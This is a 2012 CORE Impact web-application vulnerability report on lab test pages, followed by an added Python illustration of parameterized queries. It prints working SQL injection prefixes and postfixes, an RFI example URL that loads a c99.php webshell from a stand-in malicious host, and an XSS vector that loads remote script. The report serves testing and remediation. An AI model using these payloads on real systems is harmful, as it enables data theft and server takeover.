Webapps Vulnerability Report




Tuesday, May 1, 2012

Introduction

This report provides detailed information on every vulnerability that was found and successfully exploited by CORE Impact Professional during this test. This information provides a practical approach to determining the key vulnerable points in the tested scenarios and to assessing the risk associated with such vulnerabilities. This report consists of a list of the vulnerabilities found, divided by vulnerability type. Each section is preceded by a vulnerability description.

Vulnerabilities background

Code injection is a technique to introduce (or "inject") code into a computer program or system by taking advantage of the unenforced and unchecked assumptions the system makes about its inputs. The purpose of the injected code is typically to bypass or modify the originally intended functionality of the program. When the functionality bypassed is system security, the results can be disastrous.

SQL Injection Vulnerabilities

SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by string concatenation) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.

There are two types of SQL injection vulnerabilities: error-based and blind. In error-based SQL injections the error message reported by the database for an invalid query is displayed to the user, allowing him to leverage information based on this output. In the case of blind SQL injections, however, no error information is displayed to the user, increasing the difficulty of detection and exploitation of the vulnerability.

One option is to only allow alphanumeric characters. There are other characters that can be allowed (e.g. _), but try to specifically avoid the following characters: " (double quote), ' (single quote), ; (semicolon), : (colon), - (dash). Please remember that best practice is always restricting the allowed characters rather than filtering out specific bad ones (e.g. only allow alphanumeric characters and discard everything else, rather than just filtering out single quotes).

A word on fixing SQL Injection vulnerabilities

Most SQL injection vulnerabilities can be easily fixed by avoiding the use of dynamically constructed SQL queries and using parameterized queries instead. If it's not possible to use parameterized queries because the string appended is not a data value (e.g. the name of the table in a CREATE SQL statement), it is possible to filter/sanitize the string to ensure that it cannot be used to trigger SQL injection vulnerabilities.

General Conclusions and Recommendations

Use parameterized queries whenever user input is used in database queries.

Recommendation: Never construct database queries by appending user input; rely on parameterized queries instead, which guarantee that the user input will not be treated as part of the SQL query, but merely as data.

CORE Impact Professional - Webapps Vulnerability Report Page 1
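As an added illustration of the recommendation above (example code, not part of the CORE Impact report or its test cases): the WHERE [column]='<parameter>' pattern built by string concatenation, beside its parameterized replacement, plus the allow-list check for the case the report says cannot be parameterized, an identifier such as the ORDER BY column. It uses Python's sqlite3 on an in-memory table; the customers table, its columns and the rows are assumptions constructed for the example, and the same principle applies to the SQL Server backends in the findings.

```python
import re
import sqlite3

# Constructed sample rows for this example; not data from the report.
SAMPLE_ROWS = [
    (1, "Smith", "Austin"),
    (2, "Jones", "Boston"),
    (3, "O'Brien", "Chicago"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with a small, assumed 'customers' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER, lastname TEXT, city TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def find_by_lastname_dynamic(conn: sqlite3.Connection, lastname: str) -> list:
    """VULNERABLE: dynamic SQL, the report's WHERE [column]='<parameter>' pattern.
    The input becomes part of the SQL text, so a quote inside it ends the literal."""
    sql = "SELECT id, lastname FROM customers WHERE lastname = '" + lastname + "'"
    return conn.execute(sql).fetchall()


def dynamic_query_breaks(conn: sqlite3.Connection, lastname: str) -> bool:
    """True if the dynamic query fails on this input, e.g. a legitimate surname
    containing an apostrophe; such errors are the signal error-based SQLi relies on."""
    try:
        find_by_lastname_dynamic(conn, lastname)
        return False
    except sqlite3.Error:
        return True


def find_by_lastname(conn: sqlite3.Connection, lastname: str) -> list:
    """FIXED: parameterized query. The value is bound as data by the driver
    and is never interpreted as SQL, whatever characters it contains."""
    sql = "SELECT id, lastname FROM customers WHERE lastname = ?"
    return conn.execute(sql, (lastname,)).fetchall()


# Identifiers (table or column names) cannot be bound as parameters. For the
# ORDER BY case the report describes, the value is checked against a fixed
# allow-list of column names, on top of the report's character restriction.
ALLOWED_ORDER_COLUMNS = frozenset({"id", "lastname", "city"})
IDENTIFIER_RE = re.compile(r"[A-Za-z0-9_]+")


def validate_order_column(column: str) -> str:
    """Return the column name only if it is alphanumeric/underscore and allow-listed."""
    if not IDENTIFIER_RE.fullmatch(column):
        raise ValueError("order column contains disallowed characters")
    if column not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("order column is not in the allow-list")
    return column


def list_customers_ordered(conn: sqlite3.Connection, column: str) -> list:
    """Safe ORDER BY on a user-chosen column: validated first, then quoted."""
    col = validate_order_column(column)
    sql = f'SELECT id, lastname, city FROM customers ORDER BY "{col}"'
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(find_by_lastname(db, "' OR 'a'='a"))          # []: the input is data
    print(find_by_lastname_dynamic(db, "' OR 'a'='a"))  # every row: the input is SQL
    print(list_customers_ordered(db, "lastname"))
```

The dynamic version also fails on the legitimate surname O'Brien, which is why a surname field that returns database errors is itself a finding worth checking.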

PHP Remote File Inclusion Vulnerabilities

Remote file inclusion (RFI) is a technique used to attack internet websites from a computer. Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:

  include($page . '.php');

This line of PHP code is then used in URLs like the following example:

  http://www.vulnerable.website.com/index.php?page=archive

Because the $page variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server, as in this example:

  http://www.vulnerable.website.com/index.php?page=http://www.malicious.code.com/c99.php?

The include() function above instructs the server to retrieve c99.php from the remote server and run its code. This is possible because PHP allows the user to load both remote and local content with the same functions. The code sample above does not perform any checks on the content of the $page variable; it blindly passes it to the function. Because the original piece of code appended .php to the file, it would try to fetch the following URL:

  http://www.malicious.code.com/c99.php.php

As the attackers cannot know what the original code might append, they put a question mark at the end of the URL. This makes the script fetch the intended file, with the appended string as a parameter (which is ignored by the attacker's script):

  http://www.malicious.code.com/c99.php?.php

This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Scripts that send spam are also very common. Potentially, the attacker could even use the webshell to gain administrator-level, or root, access on the server.

RFI attacks are possible because of several PHP configuration flags:

* One is called register_globals. register_globals automatically defines variables in the script that are entered in the page URL. In this example, the $page variable will automatically be filled with http://www.malicious.code.com/c99.php?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers.

* Another one, even more relevant to this attack, is allow_url_fopen. This defines whether PHP should be able to fetch remote content in almost any function that takes a filename as a parameter. In PHP 5 this setting was separated for the include() family of functions and called allow_url_include. This specifically addresses the fact that the attack described here makes up the majority of security holes in current PHP software.

Cross-Site Scripting Vulnerabilities

Cross-Site Scripting (commonly referred to as XSS) attacks are the result of improper filtering of input obtained from untrusted sources. Basically, they consist of the attacker injecting malicious tags and/or script code that is executed by the user's web browser when accessing the vulnerable web site. The injected code then takes advantage of the trust given by the user to the vulnerable site. These attacks are usually targeted at all users of a web application instead of the application itself (although one could say that the users are affected because of a vulnerability of the web application). The term 'cross-site scripting' is also sometimes used in a broader sense, referring to different types of attacks involving script injection into the client.

Cross-site Scripting (XSS): http://www.owasp.org/index.php/xss
How To Prevent Cross-Site Scripting Security Issues: http://support.microsoft.com/default.aspx?scid=kb;en-us;q252985
The Cross-Site Scripting FAQ (XSS): http://www.cgisecurity.com/articles/xss-faq.shtml

Workspace Summary

Name: Reports
Started: 4/30/2012 4:05:09PM
Finished: 5/1/2012 11:57:22AM
Exact Time: 19 hours 52 minutes 13 seconds
Running Time: 1 hour 28 minutes 32 seconds

SQL Injection Vulnerabilities

SQL Injection Vulnerability
State: confirmed
Agent: Configured

The parameter is being used without sanitization inside a SQL statement as a string, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a value for filtering in the WHERE or HAVING clause of a SELECT statement without sanitization. The query being performed should look like:

  SELECT ... WHERE [column]='<parameter>'

Basic Information
URL: http://www.vmcorelab.com/testcases/sqli/blind/sql_injection_string_error_rewrite.aspx?=
Parameter Name:
Parameter Type: GET
Triggers: "'"

Backend Information

Database Engine: Microsoft SQL Server
Database Version:
Operating System:
Architecture:

Capabilities
Data: Read, Add, Modify, Delete
Files: Read, Write, Execute
Other: Stored Procedures, Admin Privileges, Process

Advanced Information
Error Method Heuristic: SqlErrorStringPage

Attack Information

Blind
Using this vulnerability an attacker can extract arbitrary information from the database backend one bit at a time, crafting special input for the vulnerable field in the following way:

  <prefix>(case WHEN <arbitrary condition> THEN <true value> ELSE (SELECT <true value> UNION SELECT <true value>) END)<postfix>

where the page should provide a valid response if the condition is true, or an error if the condition is false.

NOTE: For Oracle databases the (SELECT <true value> UNION SELECT <true value>) should be (SELECT <true value> FROM DUAL UNION SELECT <true value> FROM DUAL) instead, because the engine does not support SELECT statements without a FROM clause.

Prefix: '+
Postfix: +'
True value: ''

Union Select
Using this vulnerability an attacker can extract arbitrary information from the database backend, crafting special input for the vulnerable field in the following way:

  <prefix><arbitrary select statement><postfix>

The <arbitrary select statement> must have the same number of columns and matching types as those described in 'Query Information'. The response page will include the results for those columns described as visible in 'Query Information'.

Prefix: ' AND 1=0 UNION ALL
Postfix: --

Query Information
Field Id  Type     Visible
0         varchar  Yes
1         int      Yes

Request Information (get)
Name:
Value: %27

SQL Injection Vulnerability
State: confirmed
Agent: Configured

The parameter is being used without sanitization inside a SQL statement as a number, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a value for filtering in the WHERE or HAVING clause of a SELECT statement without sanitization. The query being performed should look like:

  SELECT ... WHERE [column]=<parameter>

Basic Information
URL: http://www.vmcorelab.com/testcases/sqli/verbose/sql_injection_integer.aspx?=
Parameter Name:
Parameter Type: GET
Triggers: "@", "a", "--", "'", "A"

Backend Information
Database Engine: Microsoft SQL Server
Database Version:
Operating System:
Architecture:

Capabilities
Data: Read, Add, Modify, Delete
Files: Read, Write, Execute
Other: Stored Procedures, Admin Privileges, Process

Advanced Information
Error Method Heuristic: HttpErrorCode

Attack Information

Blind (technique as described in the first finding)
Prefix: (1-
Postfix: )
True value: 0

Union Select (technique as described in the first finding)
Prefix: 0 AND 1=0 UNION ALL
Postfix: --

Query Information
Field Id  Type     Visible
0         varchar  Yes
1         int      Yes

Request Information (get)
Name:
Value: A

SQL Injection Vulnerability
State: confirmed
Agent: Configured

The parameter is being used without sanitization inside a SQL statement as a string, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a value for filtering in the WHERE or HAVING clause of a SELECT statement without sanitization. The query being performed should look like:

  SELECT ... WHERE [column]='<parameter>'

Basic Information
URL: http://www.vmcorelab.com/testcases/sqli/blind/remoteonly/sql_injection_string.aspx?=
Parameter Name:
Parameter Type: GET
Triggers: "'"

Backend Information
Database Engine: Microsoft SQL Server
Database Version:
Operating System:
Architecture:

Capabilities
Data: Read, Add, Modify, Delete
Files: Read, Write, Execute
Other: Stored Procedures, Admin Privileges, Process

Advanced Information
Error Method Heuristic: RedirectErrorDecoder

Attack Information

Blind (technique as described in the first finding)
Prefix: '+
Postfix: +'
True value: ''

Union Select (technique as described in the first finding)
Prefix: ' AND 1=0 UNION ALL
Postfix: --

Query Information
Field Id  Type     Visible
0         varchar  Yes
1         int      Yes

Request Information (get)
Name:
Value: %27

SQL Injection Vulnerability
State: confirmed
Agent: Configured

The parameter is being used without sanitization inside a SQL statement as a date/time, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a value for filtering in the WHERE or HAVING clause of a SELECT statement without sanitization. The query being performed should look like:

  SELECT ... WHERE [column]='<parameter>'

Basic Information
URL: http://sql.vmcorelab.com/testcases/sqli/verbose/sql_injection_linq_example_orderby_1.aspx?=&order=lastname
Parameter Name:
Parameter Type: GET
Triggers: "-1.0", "1.0", "-1", "1", "@", "a", "--", "'", "0", "A"

Backend Information
Database Engine: Microsoft SQL Server
Database Version: 9.00.1399.06
Operating System: windows
Architecture: i386

Capabilities
Data: Read, Add, Modify, Delete
Files: Read, Write, Execute
Other: Stored Procedures, Admin Privileges, Process

Advanced Information
Error Method Heuristic: HttpErrorCode

Attack Information

Blind (technique as described in the first finding)
Prefix: '+UPPER(
Postfix: )+'
True value: '01-jun-01'

Union Select (technique as described in the first finding)
Prefix: 01-jun-01' AND 1=0 UNION ALL
Postfix: --

Query Information
Field Id  Type      Visible
0         int       Yes
1         varchar   Yes
2         varchar   Yes
3         varchar   Yes
4         varchar   Yes
5         datetime  No
6         datetime  No
7         varchar   Yes
8         varchar   Yes
9         varchar   Yes
10        varchar   Yes
11        varchar   Yes
12        varchar   Yes
13        varchar   Yes
14        varchar   No
15        int       Yes
16        varchar   Yes

Request Information (get)
Name:        Value: A
Name: order  Value: LastName

SQL Injection Vulnerability
State: confirmed
Agent: Configured

The parameter is being used without sanitization inside a SQL statement as a number, where it can be used to execute arbitrary SELECT statements and extract data using blind SQL injection techniques. The parameter is being used as a column name in the ORDER BY clause of a SELECT statement without verifying that the value is valid. The query being performed should look like:

  SELECT ... ORDER BY [column1, column2], <order parameter>[, column3, column4]...

Basic Information
URL: http://sql.vmcorelab.com/testcases/sqli/verbose/sql_injection_linq_example_orderby_1.aspx?=&order=lastname
Parameter Name: order
Parameter Type: GET
Triggers: "-1", "@", "a", "--", "'", "0", "A"

Backend Information
Database Engine: Microsoft SQL Server
Database Version:
Operating System:
Architecture:

Capabilities
Data: Read, Add, Modify, Delete ✗ ✗ ✗
Files: Read ✗, Write ✗, Execute
Other: Stored Procedures ✗, Admin Privileges, Process ✗

Advanced Information
Error Method Heuristic: HttpErrorCode

Attack Information

Blind (technique as described in the first finding)
Prefix: (1-
Postfix: )
True value: 0

Query Information
Field Id  Type  Visible

Request Information (get)
Name: order
Value: A

PHP Remote File Inclusion Vulnerabilities

PHP Remote File Inclusion Vulnerability
State: confirmed
Agent: Configured

The 'module' parameter is being used as a parameter in a call to the PHP include() function, where it can be a URL controlled by the attacker containing arbitrary PHP which will be executed in the vulnerable page.

Basic Information
URL: http://php.vmcorelab.com/rfi/index.php?module=link1.php
Parameters: module

Backend Information
PHP Version: 4.3.9
Operating System: linux
Architecture: i386

Advanced Information

Request Information
Name: module
Value: IMPACT_AGENT

XSS Vulnerabilities

HTML Cross-site scripting Vulnerability
State: confirmed
Agent: Configured

There is a parameter that gets reflected to the user without proper sanitization. This leads to parameter Cross-Site scripting attacks. We use a vector that includes a remote malicious file to exploit this vulnerability.

Basic Information
URL: http://www.vmcorelab.com/testcases/sqli/blind/sql_injection_string_error_rewrite.aspx?=
Where: Parameter
Parameter Name:
Parameter Type: GET
Persistent: no

Advanced Information

Attack Information
Template: <SCRIPT SRC=XSS></SCRIPT>
Prefix: /><body>
Postfix: <
Type: Remote JavaScript
File Type: (js)

Request Information (get)
Name:
Value: /%3E%3Cbody%3E%3CSCRIPT%20SRC%3Dhttp%3A//www.example.com/test%3frnd%3d1234567890%3e%3c/sCRIPT%3E%3C

Browsers: Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Firefox 2, Firefox 3, Firefox 4, Netscape 8.1 (IE Mode), Netscape 8.1, Opera 9.02, Opera 11.01, Google Chrome 10.0, Safari 5.0.4

Index
Introduction - Page 3
Vulnerabilities Background - Page 3
Workspace Summary (Reports) - Page 3
SQL Injection Vulnerabilities - Page 3
PHP Remote File Inclusion Vulnerabilities - Page 12
XSS Vulnerabilities - Page 12